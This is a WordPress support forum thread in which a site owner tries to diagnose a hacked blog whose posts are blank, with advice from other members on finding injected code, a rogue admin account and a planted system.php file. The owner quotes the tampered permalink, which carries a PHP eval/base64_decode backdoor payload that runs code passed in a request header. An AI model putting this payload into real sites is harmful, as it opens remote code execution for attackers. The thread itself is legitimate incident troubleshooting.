lahoti
Member
Posted 11 months ago #
I have a website at http://www.khojiye.com/reviews
When I am goint to any post page content area is blank. eg.
http://www.khojiye.com/reviews/2011/02/12/pischolastic-chandigarh/
this was the original link but on the edit post page i see teh permalink as
http://www.khojiye.com/reviews/2011/02/12/pischolastic-chandigarh/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/
ALso when i inspect pages - the content are under <!-- --> and theer is extra text which has been insretd
Please help!!!
will be thankful for suggestions in this regard
jimmyt1988
Member
Posted 11 months ago #
Lol, ouch.. that one sucks!
Can you go into your appearence section, then edit current theme.. and post the contents of the post.php file in http://pastebin.com/ and then post the link here...
thanks
lahoti
Member
Posted 11 months ago #
while dearching i found a couple of posts.. to tackle this.. only q is how to identify where the hacker has put in the stuff??
jimmyt1988
Member
Posted 11 months ago #
It's underneath the
<div id = "content">
and underneath that should be a loop to output the content... there may be some odd stuff going on there, so I suggest looking there.. alternatively, post the post.php into pastebin and ill have a look for you.
lahoti
Member
Posted 11 months ago #
Thanks man...
this is from single.php which i am using for single posts..
but this is also happening on geeral archieve or pages posts.
http://pastebin.com/8hCwPw5A
lahoti
Member
Posted 11 months ago #
- also the permalink is shown with the suffix as mentioned in the startin??
- if single.php do not serve teh purpose tehse are the themes files. Let me know which you would like to see!!!?? sorry and thanks
404 Template (404.php)
Archives (archive.php)
Archives Page Template (tpl_archives.php)
Authors Page Template (tpl_authors.php)
Category Template (category.php)
Comments (comments.php)
Empty Page Template (tpl_empty.php)
Footer (footer.php)
Header (header.php)
Main Index Template (index.php)
Page Template (page.php)
Page with no Sidebars Page Template (tpl_page_nosidebars.php)
Search Form (searchform.php)
Search Results (search.php)
Single Post (single.php)
Submit Page Template (submit.php)
Theme Functions (functions.php)
author.php (author.php)
comments_new.php (comments_new.php)
comments_old.php (comments_old.php)
comments_walker.php (comments_walker.php)
cron.php (cron.php)
digg.php (digg.php)
ga.php (ga.php)
gdsr_comment.php (gdsr_comment.php)
gdsr_comment_display.php (gdsr_comment_display.php)
pager.php (pager.php)
plug.php (plug.php)
related.php (related.php)
sidebar_footer.php (sidebar_footer.php)
sidebar_left.php (sidebar_left.php)
sidebar_right.php (sidebar_right.php)
sidesearch_blog.php (sidesearch_blog.php)
sidesearch_google.php (sidesearch_google.php)
single-1.php (single-1.php)
single-1x.php (single-1x.php)
single-44.php (single-44.php)
starscape.php (starscape.php)
starscape_blog.php (starscape_blog.php)
starscape_options.php (starscape_options.php)
starscape_related.php (starscape_related.php)
starscape_saveform.php (starscape_saveform.php)
starscape_static.php (starscape_static.php)
styles.php (styles.php)
system.php (system.php)
jimmyt1988
Member
Posted 11 months ago #
Hm, that all seems fine.. must be in the database or a plugin that's latched onto <?php the_content(); ?>
If you have access to your database, you could try searching for one of the bits that has been posted.. for example:
"cialis kaufen"
See where it is put into your database.
Basically the hack hasn't removed your content.. it has made lots of dirty content hidden.
Might need help from someone else.. let's see if anyone else can help.
lahoti
Member
Posted 11 months ago #
yup i am downloading the whole site to see if i can find something somewhere..
regarding database... i have access but how to check...
lahoti
Member
Posted 11 months ago #
Regrading permalink - theer was an extra admin whom I have deleted and changed teh permalink.
How can i make sure this doen't happen again!!!
But I am not able to find teh malicious code in the doenlaoded WP code.. it seems to be in db but how can i check
I had a hack a bit like this on a client site a few years ago. From memory they'd uploaded a rogue .php file with their code, and then added a single line into either single.php or functions.php which called their rogue .php subroutine.
P.S. you should change all the admin passwords for your users.
Try the Exploit Scanner plugin to point you towards corrupt files - it always finds a lot of false-positives, but it often finds the culprit(s):
http://wordpress.org/extend/plugins/exploit-scanner/
lahoti
Member
Posted 11 months ago #
my version is a bit old.. this doesnt helps :(
lahoti
Member
Posted 11 months ago #
as mentioned in some posts and on het it seemed like pharma hack to me BUT
- my database has no malicious entry
so what could be the other issue?
lahoti
Member
Posted 11 months ago #
i found a system.php file.. matter at following link
http://pastebin.com/EqH8NmLV
please suggest how should i proceed from here. Have deleted this file
lahoti
Member
Posted 11 months ago #
yes i have looked through these BUT..
- i couldnt find wp_options being compromised which is the point raised in all 3
- plugins in first look didnt show any file (will look closer) but this system.php looked something like that
- as DB can not be cleaned therefore i am confused about what to do now... as my pages are still blank (post contents are commented)
bebekrewel
Member
Posted 10 months ago #
Hi,
my website (www.bebekrewel.com) also only show blank page for both website and admin side. Any workaround for this?
